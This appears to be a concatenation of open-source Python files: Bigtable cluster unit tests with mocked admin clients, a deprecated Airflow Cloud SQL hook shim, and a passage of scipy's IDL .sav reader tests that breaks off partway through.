client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
location = self.LOCATION_PATH + self.LOCATION_ID
state = enums.Cluster.State.RESIZING
storage_type = enums.StorageType.SSD
cluster_pb = data_v2_pb2.Cluster(
name=self.CLUSTER_NAME,
location=location,
state=state,
serve_nodes=self.SERVE_NODES,
default_storage_type=storage_type,
encryption_config=data_v2_pb2.Cluster.EncryptionConfig(
kms_key_name=self.KMS_KEY_NAME,
),
)
klass = self._get_target_class()
cluster = klass.from_pb(cluster_pb, instance)
self.assertIsInstance(cluster, klass)
self.assertEqual(cluster._instance, instance)
self.assertEqual(cluster.cluster_id, self.CLUSTER_ID)
self.assertEqual(cluster.location_id, self.LOCATION_ID)
self.assertEqual(cluster.state, state)
self.assertEqual(cluster.serve_nodes, self.SERVE_NODES)
self.assertEqual(cluster.default_storage_type, storage_type)
self.assertEqual(cluster.kms_key_name, self.KMS_KEY_NAME)
def test_from_pb_bad_cluster_name(self):
from google.cloud.bigtable_admin_v2.types import instance as data_v2_pb2
bad_cluster_name = "BAD_NAME"
cluster_pb = data_v2_pb2.Cluster(name=bad_cluster_name)
klass = self._get_target_class()
with self.assertRaises(ValueError):
klass.from_pb(cluster_pb, None)
    def test_from_pb_instance_id_mismatch(self):
from google.cloud.bigtable_admin_v2.types import instance as data_v2_pb2
ALT_INSTANCE_ID = "ALT_INSTANCE_ID"
client = _Client(self.PROJECT)
instance = _Instance(ALT_INSTANCE_ID, client)
self.assertNotEqual(self.INSTANCE_ID, ALT_INSTANCE_ID)
cluster_pb = data_v2_pb2.Cluster(name=self.CLUSTER_NAME)
klass = self._get_target_class()
with self.assertRaises(ValueError):
klass.from_pb(cluster_pb, instance)
    def test_from_pb_project_mismatch(self):
from google.cloud.bigtable_admin_v2.types import instance as data_v2_pb2
ALT_PROJECT = "ALT_PROJECT"
client = _Client(project=ALT_PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
self.assertNotEqual(self.PROJECT, ALT_PROJECT)
cluster_pb = data_v2_pb2.Cluster(name=self.CLUSTER_NAME)
klass = self._get_target_class()
with self.assertRaises(ValueError):
klass.from_pb(cluster_pb, instance)
def test___eq__(self):
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
cluster1 = self._make_one(self.CLUSTER_ID, instance, self.LOCATION_ID)
cluster2 = self._make_one(self.CLUSTER_ID, instance, self.LOCATION_ID)
self.assertEqual(cluster1, cluster2)
def test___eq__type_differ(self):
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
cluster1 = self._make_one(self.CLUSTER_ID, instance, self.LOCATION_ID)
cluster2 = object()
self.assertNotEqual(cluster1, cluster2)
def test___ne__same_value(self):
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
cluster1 = self._make_one(self.CLUSTER_ID, instance, self.LOCATION_ID)
cluster2 = self._make_one(self.CLUSTER_ID, instance, self.LOCATION_ID)
comparison_val = cluster1 != cluster2
self.assertFalse(comparison_val)
def test___ne__(self):
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
cluster1 = self._make_one("cluster_id1", instance, self.LOCATION_ID)
cluster2 = self._make_one("cluster_id2", instance, self.LOCATION_ID)
self.assertNotEqual(cluster1, cluster2)
def test_reload(self):
from google.cloud.bigtable_admin_v2.services.bigtable_instance_admin import (
BigtableInstanceAdminClient,
)
from google.cloud.bigtable_admin_v2.types import instance as data_v2_pb2
from google.cloud.bigtable.enums import StorageType
from google.cloud.bigtable.enums import Cluster
api = mock.create_autospec(BigtableInstanceAdminClient)
credentials = _make_credentials()
client = self._make_client(
project=self.PROJECT, credentials=credentials, admin=True
)
STORAGE_TYPE_SSD = StorageType.SSD
instance = _Instance(self.INSTANCE_ID, client)
cluster = self._make_one(
self.CLUSTER_ID,
instance,
location_id=self.LOCATION_ID,
serve_nodes=self.SERVE_NODES,
default_storage_type=STORAGE_TYPE_SSD,
kms_key_name=self.KMS_KEY_NAME,
)
# Create response_pb
LOCATION_ID_FROM_SERVER = "new-location-id"
STATE = Cluster.State.READY
SERVE_NODES_FROM_SERVER = 10
STORAGE_TYPE_FROM_SERVER = StorageType.HDD
response_pb = data_v2_pb2.Cluster(
name=cluster.name,
location=self.LOCATION_PATH + LOCATION_ID_FROM_SERVER,
state=STATE,
serve_nodes=SERVE_NODES_FROM_SERVER,
default_storage_type=STORAGE_TYPE_FROM_SERVER,
)
# Patch the stub used by the API method.
client._instance_admin_client = api
instance_stub = client._instance_admin_client
instance_stub.get_cluster.side_effect = [response_pb]
# Create expected_result.
expected_result = None # reload() has no return value.
# Check Cluster optional config values before.
self.assertEqual(cluster.location_id, self.LOCATION_ID)
self.assertIsNone(cluster.state)
self.assertEqual(cluster.serve_nodes, self.SERVE_NODES)
self.assertEqual(cluster.default_storage_type, STORAGE_TYPE_SSD)
# Perform the method and check the result.
result = cluster.reload()
self.assertEqual(result, expected_result)
self.assertEqual(cluster.location_id, LOCATION_ID_FROM_SERVER)
self.assertEqual(cluster.state, STATE)
self.assertEqual(cluster.serve_nodes, SERVE_NODES_FROM_SERVER)
self.assertEqual(cluster.default_storage_type, STORAGE_TYPE_FROM_SERVER)
self.assertEqual(cluster.kms_key_name, None)
def test_exists(self):
from google.cloud.bigtable_admin_v2.services.bigtable_instance_admin import (
BigtableInstanceAdminClient,
)
from google.cloud.bigtable_admin_v2.types import instance as data_v2_pb2
from google.cloud.bigtable.instance import Instance
from google.api_core import exceptions
instance_api = mock.create_autospec(BigtableInstanceAdminClient)
credentials = _make_credentials()
client = self._make_client(
project=self.PROJECT, credentials=credentials, admin=True
)
instance = Instance(self.INSTANCE_ID, client)
# Create response_pb
cluster_name = client.instance_admin_client.cluster_path(
self.PROJECT, self.INSTANCE_ID, self.CLUSTER_ID
)
response_pb = data_v2_pb2.Cluster(name=cluster_name)
# Patch the stub used by the API method.
client._instance_admin_client = instance_api
bigtable_instance_stub = client._instance_admin_client
bigtable_instance_stub.get_cluster.side_effect = [
response_pb,
exceptions.NotFound("testing"),
exceptions.BadRequest("testing"),
]
# Perform the method and check the result.
non_existing_cluster_id = "cluster-id-2"
alt_cluster_1 = self._make_one(self.CLUSTER_ID, instance)
alt_cluster_2 = self._make_one(non_existing_cluster_id, instance)
self.assertTrue(alt_cluster_1.exists())
self.assertFalse(alt_cluster_2.exists())
with self.assertRaises(exceptions.BadRequest):
alt_cluster_1.exists()
def test_create(self):
import datetime
from google.longrunning import operations_pb2
from google.protobuf.any_pb2 import Any
from google.cloud.bigtable_admin_v2.types import (
bigtable_instance_admin as messages_v2_pb2,
)
from google.cloud._helpers import _datetime_to_pb_timestamp
from google.cloud.bigtable.instance import Instance
from google.cloud.bigtable_admin_v2.services.bigtable_instance_admin import (
BigtableInstanceAdminClient,
)
from google.cloud.bigtable_admin_v2.types import instance as instance_v2_pb2
from google.cloud.bigtable.enums import StorageType
NOW = datetime.datetime.utcnow()
NOW_PB = _datetime_to_pb_timestamp(NOW)
credentials = _make_credentials()
client = self._make_client(
project=self.PROJECT, credentials=credentials, admin=True
)
STORAGE_TYPE_SSD = StorageType.SSD
LOCATION = self.LOCATION_PATH + self.LOCATION_ID
instance = Instance(self.INSTANCE_ID, client)
cluster = self._make_one(
self.CLUSTER_ID,
instance,
location_id=self.LOCATION_ID,
serve_nodes=self.SERVE_NODES,
default_storage_type=STORAGE_TYPE_SSD,
)
expected_request_cluster = instance_v2_pb2.Cluster(
location=LOCATION,
serve_nodes=cluster.serve_nodes,
default_storage_type=cluster.default_storage_type,
)
expected_request = {
"request": {
"parent": instance.name,
"cluster_id": self.CLUSTER_ID,
"cluster": expected_request_cluster,
}
}
name = instance.name
metadata = messages_v2_pb2.CreateClusterMetadata(request_time=NOW_PB)
type_url = "type.googleapis.com/{}".format(
messages_v2_pb2.CreateClusterMetadata._meta._pb.DESCRIPTOR.full_name
)
response_pb = operations_pb2.Operation(
name=self.OP_NAME,
metadata=Any(type_url=type_url, value=metadata._pb.SerializeToString()),
)
# Patch the stub used by the API method.
api = mock.create_autospec(BigtableInstanceAdminClient)
api.common_location_path.return_value = LOCATION
client._instance_admin_client = api
cluster._instance._client = client
cluster._instance._client.instance_admin_client.instance_path.return_value = (
name
)
client._instance_admin_client.create_cluster.return_value = response_pb
# Perform the method and check the result.
cluster.create()
actual_request = client._instance_admin_client.create_cluster.call_args_list[
0
].kwargs
self.assertEqual(actual_request, expected_request)
def test_create_w_cmek(self):
import datetime
from google.longrunning import operations_pb2
from google.protobuf.any_pb2 import Any
from google.cloud.bigtable_admin_v2.types import (
bigtable_instance_admin as messages_v2_pb2,
)
from google.cloud._helpers import _datetime_to_pb_timestamp
from google.cloud.bigtable.instance import Instance
from google.cloud.bigtable_admin_v2.services.bigtable_instance_admin import (
BigtableInstanceAdminClient,
)
from google.cloud.bigtable_admin_v2.types import instance as instance_v2_pb2
from google.cloud.bigtable.enums import StorageType
NOW = datetime.datetime.utcnow()
NOW_PB = _datetime_to_pb_timestamp(NOW)
credentials = _make_credentials()
client = self._make_client(
project=self.PROJECT, credentials=credentials, admin=True
)
STORAGE_TYPE_SSD = StorageType.SSD
LOCATION = self.LOCATION_PATH + self.LOCATION_ID
instance = Instance(self.INSTANCE_ID, client)
cluster = self._make_one(
self.CLUSTER_ID,
instance,
location_id=self.LOCATION_ID,
serve_nodes=self.SERVE_NODES,
default_storage_type=STORAGE_TYPE_SSD,
kms_key_name=self.KMS_KEY_NAME,
)
expected_request_cluster = instance_v2_pb2.Cluster(
location=LOCATION,
serve_nodes=cluster.serve_nodes,
default_storage_type=cluster.default_storage_type,
encryption_config=instance_v2_pb2.Cluster.EncryptionConfig(
kms_key_name=self.KMS_KEY_NAME,
),
)
expected_request = {
"request": {
"parent": instance.name,
"cluster_id": self.CLUSTER_ID,
"cluster": expected_request_cluster,
}
}
name = instance.name
metadata = messages_v2_pb2.CreateClusterMetadata(request_time=NOW_PB)
type_url = "type.googleapis.com/{}".format(
messages_v2_pb2.CreateClusterMetadata._meta._pb.DESCRIPTOR.full_name
)
response_pb = operations_pb2.Operation(
name=self.OP_NAME,
metadata=Any(type_url=type_url, value=metadata._pb.SerializeToString()),
)
# Patch the stub used by the API method.
api = mock.create_autospec(BigtableInstanceAdminClient)
api.common_location_path.return_value = LOCATION
client._instance_admin_client = api
cluster._instance._client = client
cluster._instance._client.instance_admin_client.instance_path.return_value = (
name
)
client._instance_admin_client.create_cluster.return_value = response_pb
# Perform the method and check the result.
cluster.create()
actual_request = client._instance_admin_client.create_cluster.call_args_list[
0
].kwargs
self.assertEqual(actual_request, expected_request)
def test_update(self):
import datetime
from google.longrunning import operations_pb2
from google.protobuf.any_pb2 import Any
from google.cloud._helpers import _datetime_to_pb_timestamp
from google.cloud.bigtable_admin_v2.types import (
bigtable_instance_admin as messages_v2_pb2,
)
from google.cloud.bigtable_admin_v2.services.bigtable_instance_admin import (
BigtableInstanceAdminClient,
)
from google.cloud.bigtable.enums import StorageType
NOW = datetime.datetime.utcnow()
NOW_PB = _datetime_to_pb_timestamp(NOW)
credentials = _make_credentials()
client = self._make_client(
project=self.PROJECT, credentials=credentials, admin=True
)
STORAGE_TYPE_SSD = StorageType.SSD
instance = _Instance(self.INSTANCE_ID, client)
cluster = self._make_one(
self.CLUSTER_ID,
instance,
location_id=self.LOCATION_ID,
serve_nodes=self.SERVE_NODES,
default_storage_type=STORAGE_TYPE_SSD,
)
# Create expected_request
expected_request = {
"request": {
"name": "projects/project/instances/instance-id/clusters/cluster-id",
"serve_nodes": 5,
"location": None,
}
}
metadata = messages_v2_pb2.UpdateClusterMetadata(request_time=NOW_PB)
type_url = "type.googleapis.com/{}".format(
messages_v2_pb2.UpdateClusterMetadata._meta._pb.DESCRIPTOR.full_name
)
response_pb = operations_pb2.Operation(
name=self.OP_NAME,
metadata=Any(type_url=type_url, value=metadata._pb.SerializeToString()),
)
# Patch the stub used by the API method.
api = mock.create_autospec(BigtableInstanceAdminClient)
client._instance_admin_client = api
cluster._instance._client.instance_admin_client.cluster_path.return_value = (
"projects/project/instances/instance-id/clusters/cluster-id"
)
# Perform the method and check the result.
client._instance_admin_client.update_cluster.return_value = response_pb
cluster.update()
actual_request = client._instance_admin_client.update_cluster.call_args_list[
0
].kwargs
self.assertEqual(actual_request, expected_request)
def test_delete(self):
from google.protobuf import empty_pb2
from google.cloud.bigtable_admin_v2.services.bigtable_instance_admin import (
BigtableInstanceAdminClient,
)
api = mock.create_autospec(BigtableInstanceAdminClient)
credentials = _make_credentials()
client = self._make_client(
project=self.PROJECT, credentials=credentials, admin=True
)
instance = _Instance(self.INSTANCE_ID, client)
cluster = self._make_one(self.CLUSTER_ID, instance, self.LOCATION_ID)
# Create response_pb
response_pb = empty_pb2.Empty()
# Patch the stub used by the API method.
client._instance_admin_client = api
instance_admin_client = client._instance_admin_client
instance_stub = instance_admin_client
instance_stub.delete_cluster.side_effect = [response_pb]
# Create expected_result.
expected_result = None # delete() has no return value.
# Perform the method and check the result.
result = cluster.delete()
self.assertEqual(result, expected_result)
class _Instance(object):
def __init__(self, instance_id, client):
self.instance_id = instance_id
self._client = client
def __eq__(self, other):
return other.instance_id == self.instance_id and other._client == self._client
class _Client(object):
def __init__(self, project):
self.project = project
self.project_name = "projects/" + self.project
self._operations_stub = mock.sentinel.operations_stub
def __eq__(self, other):
return other.project == self.project and other.project_name == self.project_name
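# --- Illustrative usage sketch (not part of the original test module) ---
# The Cluster API exercised above with mocks would typically be driven against a
# real project like this (project/instance/cluster ids and the location are
# hypothetical, and the exact admin surface may differ between library versions):
#
#     from google.cloud.bigtable.client import Client
#     from google.cloud.bigtable.enums import StorageType
#
#     client = Client(project="my-project", admin=True)
#     instance = client.instance("my-instance")
#     cluster = instance.cluster(
#         "my-cluster",
#         location_id="us-central1-b",
#         serve_nodes=3,
#         default_storage_type=StorageType.SSD,
#     )
#     operation = cluster.create()      # long-running operation
#     operation.result(timeout=120)     # block until the cluster exists
#     print(cluster.exists())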
|
apache-2.0
|
airbnb/airflow
|
airflow/contrib/hooks/gcp_sql_hook.py
|
7
|
1779
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module is deprecated. Please use `airflow.providers.google.cloud.hooks.cloud_sql`."""
import warnings
from airflow.providers.google.cloud.hooks.cloud_sql import CloudSQLDatabaseHook, CloudSQLHook
warnings.warn(
"This module is deprecated. Please use `airflow.providers.google.cloud.hooks.cloud_sql`",
DeprecationWarning,
stacklevel=2,
)
class CloudSqlDatabaseHook(CloudSQLDatabaseHook):
"""
This class is deprecated.
Please use `airflow.providers.google.cloud.hooks.cloud_sql.CloudSQLDatabaseHook`.
"""
def __init__(self, *args, **kwargs):
warnings.warn(self.__doc__, DeprecationWarning, stacklevel=2)
super().__init__(*args, **kwargs)
class CloudSqlHook(CloudSQLHook):
"""This class is deprecated. Please use `airflow.providers.google.cloud.hooks.sql.CloudSQLHook`."""
def __init__(self, *args, **kwargs):
warnings.warn(self.__doc__, DeprecationWarning, stacklevel=2)
super().__init__(*args, **kwargs)
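# --- Migration sketch (not part of the original module) ---
# Existing DAG code importing from this deprecated location keeps working but
# emits a DeprecationWarning; new code should import from the providers package
# directly, e.g.:
#
#     # old (deprecated shim, still functional)
#     from airflow.contrib.hooks.gcp_sql_hook import CloudSqlHook, CloudSqlDatabaseHook
#     # new (preferred)
#     from airflow.providers.google.cloud.hooks.cloud_sql import CloudSQLHook, CloudSQLDatabaseHook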
|
apache-2.0
|
jor-/scipy
|
scipy/io/tests/test_idl.py
|
26
|
19683
|
from __future__ import division, print_function, absolute_import
from os import path
import warnings
DATA_PATH = path.join(path.dirname(__file__), 'data')
import numpy as np
from numpy.testing import (assert_equal, assert_array_equal,
assert_)
from scipy._lib._numpy_compat import suppress_warnings
from scipy.io.idl import readsav
def object_array(*args):
"""Constructs a numpy array of objects"""
array = np.empty(len(args), dtype=object)
for i in range(len(args)):
array[i] = args[i]
return array
def assert_identical(a, b):
"""Assert whether value AND type are the same"""
assert_equal(a, b)
if type(b) is str:
assert_equal(type(a), type(b))
else:
assert_equal(np.asarray(a).dtype.type, np.asarray(b).dtype.type)
def assert_array_identical(a, b):
"""Assert whether values AND type are the same"""
assert_array_equal(a, b)
assert_equal(a.dtype.type, b.dtype.type)
# Define vectorized ID function for pointer arrays
vect_id = np.vectorize(id)
class TestIdict:
def test_idict(self):
custom_dict = {'a': np.int16(999)}
original_id = id(custom_dict)
s = readsav(path.join(DATA_PATH, 'scalar_byte.sav'), idict=custom_dict, verbose=False)
assert_equal(original_id, id(s))
assert_('a' in s)
assert_identical(s['a'], np.int16(999))
assert_identical(s['i8u'], np.uint8(234))
class TestScalars:
# Test that scalar values are read in with the correct value and type
def test_byte(self):
s = readsav(path.join(DATA_PATH, 'scalar_byte.sav'), verbose=False)
assert_identical(s.i8u, np.uint8(234))
def test_int16(self):
s = readsav(path.join(DATA_PATH, 'scalar_int16.sav'), verbose=False)
assert_identical(s.i16s, np.int16(-23456))
def test_int32(self):
s = readsav(path.join(DATA_PATH, 'scalar_int32.sav'), verbose=False)
assert_identical(s.i32s, np.int32(-1234567890))
def test_float32(self):
s = readsav(path.join(DATA_PATH, 'scalar_float32.sav'), verbose=False)
assert_identical(s.f32, np.float32(-3.1234567e+37))
def test_float64(self):
s = readsav(path.join(DATA_PATH, 'scalar_float64.sav'), verbose=False)
assert_identical(s.f64, np.float64(-1.1976931348623157e+307))
def test_complex32(self):
s = readsav(path.join(DATA_PATH, 'scalar_complex32.sav'), verbose=False)
assert_identical(s.c32, np.complex64(3.124442e13-2.312442e31j))
def test_bytes(self):
s = readsav(path.join(DATA_PATH, 'scalar_string.sav'), verbose=False)
assert_identical(s.s, np.bytes_("The quick brown fox jumps over the lazy python"))
def test_structure(self):
pass
def test_complex64(self):
s = readsav(path.join(DATA_PATH, 'scalar_complex64.sav'), verbose=False)
assert_identical(s.c64, np.complex128(1.1987253647623157e+112-5.1987258887729157e+307j))
def test_heap_pointer(self):
pass
def test_object_reference(self):
pass
def test_uint16(self):
s = readsav(path.join(DATA_PATH, 'scalar_uint16.sav'), verbose=False)
assert_identical(s.i16u, np.uint16(65511))
def test_uint32(self):
s = readsav(path.join(DATA_PATH, 'scalar_uint32.sav'), verbose=False)
assert_identical(s.i32u, np.uint32(4294967233))
def test_int64(self):
s = readsav(path.join(DATA_PATH, 'scalar_int64.sav'), verbose=False)
assert_identical(s.i64s, np.int64(-9223372036854774567))
def test_uint64(self):
s = readsav(path.join(DATA_PATH, 'scalar_uint64.sav'), verbose=False)
assert_identical(s.i64u, np.uint64(18446744073709529285))
class TestCompressed(TestScalars):
# Test that compressed .sav files can be read in
def test_compressed(self):
s = readsav(path.join(DATA_PATH, 'various_compressed.sav'), verbose=False)
assert_identical(s.i8u, np.uint8(234))
assert_identical(s.f32, np.float32(-3.1234567e+37))
assert_identical(s.c64, np.complex128(1.1987253647623157e+112-5.1987258887729157e+307j))
assert_equal(s.array5d.shape, (4, 3, 4, 6, 5))
assert_identical(s.arrays.a[0], np.array([1, 2, 3], dtype=np.int16))
assert_identical(s.arrays.b[0], np.array([4., 5., 6., 7.], dtype=np.float32))
assert_identical(s.arrays.c[0], np.array([np.complex64(1+2j), np.complex64(7+8j)]))
assert_identical(s.arrays.d[0], np.array([b"cheese", b"bacon", b"spam"], dtype=object))
class TestArrayDimensions:
# Test that multi-dimensional arrays are read in with the correct dimensions
def test_1d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_1d.sav'), verbose=False)
assert_equal(s.array1d.shape, (123, ))
def test_2d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_2d.sav'), verbose=False)
assert_equal(s.array2d.shape, (22, 12))
def test_3d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_3d.sav'), verbose=False)
assert_equal(s.array3d.shape, (11, 22, 12))
def test_4d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_4d.sav'), verbose=False)
assert_equal(s.array4d.shape, (4, 5, 8, 7))
def test_5d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_5d.sav'), verbose=False)
assert_equal(s.array5d.shape, (4, 3, 4, 6, 5))
def test_6d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_6d.sav'), verbose=False)
assert_equal(s.array6d.shape, (3, 6, 4, 5, 3, 4))
def test_7d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_7d.sav'), verbose=False)
assert_equal(s.array7d.shape, (2, 1, 2, 3, 4, 3, 2))
def test_8d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_8d.sav'), verbose=False)
assert_equal(s.array8d.shape, (4, 3, 2, 1, 2, 3, 5, 4))
class TestStructures:
def test_scalars(self):
s = readsav(path.join(DATA_PATH, 'struct_scalars.sav'), verbose=False)
assert_identical(s.scalars.a, np.array(np.int16(1)))
assert_identical(s.scalars.b, np.array(np.int32(2)))
assert_identical(s.scalars.c, np.array(np.float32(3.)))
assert_identical(s.scalars.d, np.array(np.float64(4.)))
assert_identical(s.scalars.e, np.array([b"spam"], dtype=object))
assert_identical(s.scalars.f, np.array(np.complex64(-1.+3j)))
def test_scalars_replicated(self):
s = readsav(path.join(DATA_PATH, 'struct_scalars_replicated.sav'), verbose=False)
assert_identical(s.scalars_rep.a, np.repeat(np.int16(1), 5))
assert_identical(s.scalars_rep.b, np.repeat(np.int32(2), 5))
assert_identical(s.scalars_rep.c, np.repeat(np.float32(3.), 5))
assert_identical(s.scalars_rep.d, np.repeat(np.float64(4.), 5))
assert_identical(s.scalars_rep.e, np.repeat(b"spam", 5).astype(object))
assert_identical(s.scalars_rep.f, np.repeat(np.complex64(-1.+3j), 5))
def test_scalars_replicated_3d(self):
s = readsav(path.join(DATA_PATH, 'struct_scalars_replicated_3d.sav'), verbose=False)
assert_identical(s.scalars_rep.a, np.repeat(np.int16(1), 24).reshape(4, 3, 2))
assert_identical(s.scalars_rep.b, np.repeat(np.int32(2), 24).reshape(4, 3, 2))
assert_identical(s.scalars_rep.c, np.repeat(np.float32(3.), 24).reshape(4, 3, 2))
assert_identical(s.scalars_rep.d, np.repeat(np.float64(4.), 24).reshape(4, 3, 2))
assert_identical(s.scalars_rep.e, np.repeat(b"spam", 24).reshape(4, 3, 2).astype(object))
assert_identical(s.scalars_rep.f, np.repeat(np.complex64(-1.+3j), 24).reshape(4, 3, 2))
def test_arrays(self):
s = readsav(path.join(DATA_PATH, 'struct_arrays.sav'), verbose=False)
assert_array_identical(s.arrays.a[0], np.array([1, 2, 3], dtype=np.int16))
assert_array_identical(s.arrays.b[0], np.array([4., 5., 6., 7.], dtype=np.float32))
assert_array_identical(s.arrays.c[0], np.array([np.complex64(1+2j), np.complex64(7+8j)]))
assert_array_identical(s.arrays.d[0], np.array([b"cheese", b"bacon", b"spam"], dtype=object))
def test_arrays_replicated(self):
s = readsav(path.join(DATA_PATH, 'struct_arrays_replicated.sav'), verbose=False)
# Check column types
assert_(s.arrays_rep.a.dtype.type is np.object_)
assert_(s.arrays_rep.b.dtype.type is np.object_)
assert_(s.arrays_rep.c.dtype.type is np.object_)
assert_(s.arrays_rep.d.dtype.type is np.object_)
# Check column shapes
assert_equal(s.arrays_rep.a.shape, (5, ))
assert_equal(s.arrays_rep.b.shape, (5, ))
assert_equal(s.arrays_rep.c.shape, (5, ))
assert_equal(s.arrays_rep.d.shape, (5, ))
# Check values
for i in range(5):
assert_array_identical(s.arrays_rep.a[i],
np.array([1, 2, 3], dtype=np.int16))
assert_array_identical(s.arrays_rep.b[i],
np.array([4., 5., 6., 7.], dtype=np.float32))
assert_array_identical(s.arrays_rep.c[i],
np.array([np.complex64(1+2j),
np.complex64(7+8j)]))
assert_array_identical(s.arrays_rep.d[i],
np.array([b"cheese", b"bacon", b"spam"],
dtype=object))
def test_arrays_replicated_3d(self):
s = readsav(path.join(DATA_PATH, 'struct_arrays_replicated_3d.sav'), verbose=False)
# Check column types
assert_(s.arrays_rep.a.dtype.type is np.object_)
assert_(s.arrays_rep.b.dtype.type is np.object_)
assert_(s.arrays_rep.c.dtype.type is np.object_)
assert_(s.arrays_rep.d.dtype.type is np.object_)
# Check column shapes
assert_equal(s.arrays_rep.a.shape, (4, 3, 2))
assert_equal(s.arrays_rep.b.shape, (4, 3, 2))
assert_equal(s.arrays_rep.c.shape, (4, 3, 2))
assert_equal(s.arrays_rep.d.shape, (4, 3, 2))
# Check values
for i in range(4):
for j in range(3):
for k in range(2):
assert_array_identical(s.arrays_rep.a[i, j, k],
np.array([1, 2, 3], dtype=np.int16))
assert_array_identical(s.arrays_rep.b[i, j, k],
np.array([4., 5., 6., 7.],
dtype=np.float32))
assert_array_identical(s.arrays_rep.c[i, j, k],
np.array([np.complex64(1+2j),
np.complex64(7+8j)]))
assert_array_identical(s.arrays_rep.d[i, j, k],
np.array([b"cheese", b"bacon", b"spam"],
dtype=object))
def test_inheritance(self):
s = readsav(path.join(DATA_PATH, 'struct_inherit.sav'), verbose=False)
assert_identical(s.fc.x, np.array([0], dtype=np.int16))
assert_identical(s.fc.y, np.array([0], dtype=np.int16))
assert_identical(s.fc.r, np.array([0], dtype=np.int16))
assert_identical(s.fc.c, np.array([4], dtype=np.int16))
def test_arrays_corrupt_idl80(self):
# test byte arrays with missing nbyte information from IDL 8.0 .sav file
with suppress_warnings() as sup:
sup.filter(UserWarning, "Not able to verify number of bytes from header")
s = readsav(path.join(DATA_PATH,'struct_arrays_byte_idl80.sav'),
verbose=False)
assert_identical(s.y.x[0], np.array([55,66], dtype=np.uint8))
class TestPointers:
# Check that pointers in .sav files produce references to the same object in Python
def test_pointers(self):
s = readsav(path.join(DATA_PATH, 'scalar_heap_pointer.sav'), verbose=False)
assert_identical(s.c64_pointer1, np.complex128(1.1987253647623157e+112-5.1987258887729157e+307j))
assert_identical(s.c64_pointer2, np.complex128(1.1987253647623157e+112-5.1987258887729157e+307j))
assert_(s.c64_pointer1 is s.c64_pointer2)
class TestPointerArray:
# Test that pointers in arrays are correctly read in
def test_1d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_1d.sav'), verbose=False)
assert_equal(s.array1d.shape, (123, ))
assert_(np.all(s.array1d == np.float32(4.)))
assert_(np.all(vect_id(s.array1d) == id(s.array1d[0])))
def test_2d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_2d.sav'), verbose=False)
assert_equal(s.array2d.shape, (22, 12))
assert_(np.all(s.array2d == np.float32(4.)))
assert_(np.all(vect_id(s.array2d) == id(s.array2d[0,0])))
def test_3d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_3d.sav'), verbose=False)
assert_equal(s.array3d.shape, (11, 22, 12))
assert_(np.all(s.array3d == np.float32(4.)))
assert_(np.all(vect_id(s.array3d) == id(s.array3d[0,0,0])))
def test_4d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_4d.sav'), verbose=False)
assert_equal(s.array4d.shape, (4, 5, 8, 7))
assert_(np.all(s.array4d == np.float32(4.)))
assert_(np.all(vect_id(s.array4d) == id(s.array4d[0,0,0,0])))
def test_5d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_5d.sav'), verbose=False)
assert_equal(s.array5d.shape, (4, 3, 4, 6, 5))
assert_(np.all(s.array5d == np.float32(4.)))
assert_(np.all(vect_id(s.array5d) == id(s.array5d[0,0,0,0,0])))
def test_6d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_6d.sav'), verbose=False)
assert_equal(s.array6d.shape, (3, 6, 4, 5, 3, 4))
assert_(np.all(s.array6d == np.float32(4.)))
assert_(np.all(vect_id(s.array6d) == id(s.array6d[0,0,0,0,0,0])))
def test_7d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_7d.sav'), verbose=False)
assert_equal(s.array7d.shape, (2, 1, 2, 3, 4, 3, 2))
assert_(np.all(s.array7d == np.float32(4.)))
assert_(np.all(vect_id(s.array7d) == id(s.array7d[0,0,0,0,0,0,0])))
def test_8d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_8d.sav'), verbose=False)
assert_equal(s.array8d.shape, (4, 3, 2, 1, 2, 3, 5, 4))
assert_(np.all(s.array8d == np.float32(4.)))
assert_(np.all(vect_id(s.array8d) == id(s.array8d[0,0,0,0,0,0,0,0])))
class TestPointerStructures:
# Test that structures are correctly read in
def test_scalars(self):
s = readsav(path.join(DATA_PATH, 'struct_pointers.sav'), verbose=False)
assert_identical(s.pointers.g, np.array(np.float32(4.), dtype=np.object_))
assert_identical(s.pointers.h, np.array(np.float32(4.), dtype=np.object_))
assert_(id(s.pointers.g[0]) == id(s.pointers.h[0]))
def test_pointers_replicated(self):
s = readsav(path.join(DATA_PATH, 'struct_pointers_replicated.sav'), verbose=False)
assert_identical(s.pointers_rep.g, np.repeat(np.float32(4.), 5).astype(np.object_))
assert_identical(s.pointers_rep.h, np.repeat(np.float32(4.), 5).astype(np.object_))
assert_(np.all(vect_id(s.pointers_rep.g) == vect_id(s.pointers_rep.h)))
def test_pointers_replicated_3d(self):
s = readsav(path.join(DATA_PATH, 'struct_pointers_replicated_3d.sav'), verbose=False)
s_expect = np.repeat(np.float32(4.), 24).reshape(4, 3, 2).astype(np.object_)
assert_identical(s.pointers_rep.g, s_expect)
